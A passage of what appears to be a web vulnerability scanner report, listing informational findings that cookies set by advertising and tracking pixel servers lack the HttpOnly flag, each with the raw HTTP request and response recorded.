6.147. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4d97b40ad252fd37 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7284381257%3As1%3D1301791557192%3Ats%3D1301791557192

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7284381257%3As1%3D1301791557192%3Ats%3D1301791557192; Domain=.33across.com; Expires=Sun, 08-Apr-2012 00:18:15 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 00:18:14 GMT
Connection: close
Server: 33XG5

GIF89a.............!...
...,...........L..;
6.148. http://pixel.invitemedia.com/adnxs_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /adnxs_sync

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adnxs_sync?uid=8663496762294337265 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exchange_uid="eyI0IjpbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsNzM0MjI5XX0="; partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; segments_p1="eJzjYuZoiuBi4Xg8gZGLmeMkB5C5/gOIuRHEfLyWCcj8xwEk/vsAAMt1Cgc="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 12:31:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 09-Apr-2011 12:30:49 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; Domain=invitemedia.com; expires=Sun, 08-Apr-2012 12:31:09 GMT; Path=/
Set-Cookie: uid=1c9ca161-bef8-4e06-8402-12a87b649832; Domain=invitemedia.com; expires=Mon, 08-Apr-2013 12:31:09 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
6.149. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=356791091;fpan=1;fpa=P0-2064108896-1302352190176;ns=0;url=http%3A%2F%2Fwww.wptz.com%2Findex.html;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1302352190175;tzo=300;a=p-41jrVeSPpekVU;labels=Hearst-Argyle%20Television%20Stations HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EOIBIwG6BoFQCfgkmVAAAKpQzJMFAA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EFUBJAG8BoGRAJ-CSZUAAAqlDMkwUA; expires=Fri, 08-Jul-2011 12:29:56 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Sat, 09 Apr 2011 12:29:56 GMT
Server: QS

6.150. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=3%2e11%2e18%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EDkBZQG-BoHRAJ-CTrGhrTkRCoRvkwAP8Uy4EwC6gQzxQwMCAQULENkwMDCGCBAQQHDOgz21AA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://tag.admeld.com/match?admeld_adprovider_id=247&external_user_id=9uTrnaPmscvvsLOc87f_y6Dh5pLvt7eYp7LzEu2K
Set-Cookie: d=EBUBawG-BoHRAJrR4fw5HrGhrTkRCoRvkwAP8Uy4EwC6gQzxQwMCAQULENkwMDCGCBAQQHDOgz21AA; expires=Sun, 10-Jul-2011 16:31:19 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 11 Apr 2011 16:31:19 GMT
Server: QS

6.151. http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-86ZJnSph3DaTI.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-86ZJnSph3DaTI.gif HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EDkBOgG-BoHRAJ-CSZUBCoRvkwAP8Uy4EwC6gQ_fMNtQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1056957&id=1057011&id=665695&id=1056959&id=744662&id=668997&id=744652&id=744660&t=2
Set-Cookie: d=EDQBVgG-BoHRAJ-CTrGhrTkRCoRvkwAP8Uy4EwC6gQyCQgcLENkwmBDhDOgz21A; expires=Sun, 10-Jul-2011 16:21:24 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 11 Apr 2011 16:21:24 GMT
Server: QS

6.152. http://pixel.quantserve.com/seg/p-ddEiIs2qFSY46.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/p-ddEiIs2qFSY46.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-ddEiIs2qFSY46.js?ttl=86400 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EOYBQQG8BoGRAJ-CSZUAAAqEYQ2TAAy6EAAAqoELyBC58g21AA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EIoBNgG-BoHRAJ-CSZUBCoRvkwAMuhAAuoEP3zDbUA; expires=Sun, 10-Jul-2011 16:21:06 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S19936:E0-1410006978-1302538866921"
Cache-Control: private, no-transform, max-age=86400
Expires: Tue, 12 Apr 2011 16:21:06 GMT
Content-Length: 508
Date: Mon, 11 Apr 2011 16:21:06 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...
6.153. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=4608069584519221037&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1185=4608069584519221037; put_1523=bf0d68cb-2449-4e5d-8b20-461d8ec850c3; rpb=4212%3D1%264210%3D1%264940%3D1; rpx=4212%3D11005%2C0%2C1%2C%2C%264210%3D11063%2C0%2C1%2C%2C%264940%3D11073%2C0%2C1%2C%2C; put_1994=1iolb30nur9ak

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4210%3D1%264940%3D1%264212%3D1; expires=Wed, 11-May-2011 16:41:21 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11005%2C163%2C2%2C%2C%264210%3D11063%2C0%2C1%2C%2C%264940%3D11073%2C0%2C1%2C%2C; expires=Wed, 11-May-2011 16:41:21 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=4608069584519221037; expires=Fri, 10-Jun-2011 16:41:21 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
6.154. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=4608069584519221037 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8840a33d-f9e0-46ff-b61b-4ddb7b39eea5

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:20 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=8840a33d-f9e0-46ff-b61b-4ddb7b39eea5; expires=Wed, 10-Apr-2013 16:41:20 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
6.155. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=8663496762294337265 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; uid=4608069584519221037; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:53:30 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:53:30 GMT

GIF89a.............!.......,...........D..;
6.156. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dgreSKR1l3-fFqwVrhKk2fFaNoS5G6K4DRLGa89Io1jPVx7awJtIT5bFbQ7adJJ3pFdSCXahzXLc-TDDfVb0Sw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; adImpCount=hcuD_cLY-cjxqeempz1C09LiiLtEXvCaXpHHOA8DkTFd6ISB_q_vS5rapRhLZ6kjcxpGHxRlubu1xR21Mxu4g2rcKaMQWqzDYZ8P9fBVq5p73bvsD6p3TnXOe8vTPY4VU9calPcDERwWgL55mdMPjVxA65AQa1XNGiNWk1OEu9E; fc=yE4Hdjb8_0IaDw-kvbcz96G8z33hBqLkmZH60ZtWjYiubHizRKm2LPdnMwd17GsWDUfDXUyqCFuhCITH03Jq4PsHnm-jU8W9DeXq1d2r1JJxdxA13xTlPwal8PUkKYzs; pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:44 GMT; Path=/
Set-Cookie: pf=pJpvJJw-GY9WcrPY3UbbzAlMaMwjMfoDxm5_TBEk8RcpEp12f4u5I5reLcuvKZO7DDRejmM4-R0GPw8nZnxsAfLrRYfxpzU5vS1ocTon5Z92K-LSqiaOfWtHgQNLtq6AvBbEaXo59AdMpfQCrukR99t7fTrL-rvX4z4sMorKmw9FqlNCKvbEhmZDWAkIGHt4UyiHLNzcYCFCJazl7zAeb4zqo4lkid4kD4TI-YQ4_BSt27hlQCxY8c-5b6K26p0Kz3ueh4ztohdpSnKdH68HXZsSCvcf9l-fdBL6evCUFhUm7JWc-kGHCLEPkH3QsUD6Y7FbXeXJW_eEMAI0SR_jCPv9KKD44EjZtH-gt_pb7_bJBG17ey91deEv_XnAkcATlEHOtsC5SJkchA_zhEWhUw; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:44 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:43 GMT

GIF89a.............!.......,...........D..;
6.157. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:19 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=4435508679323945078&fpid=4&nu=n&t=
...[SNIP]...
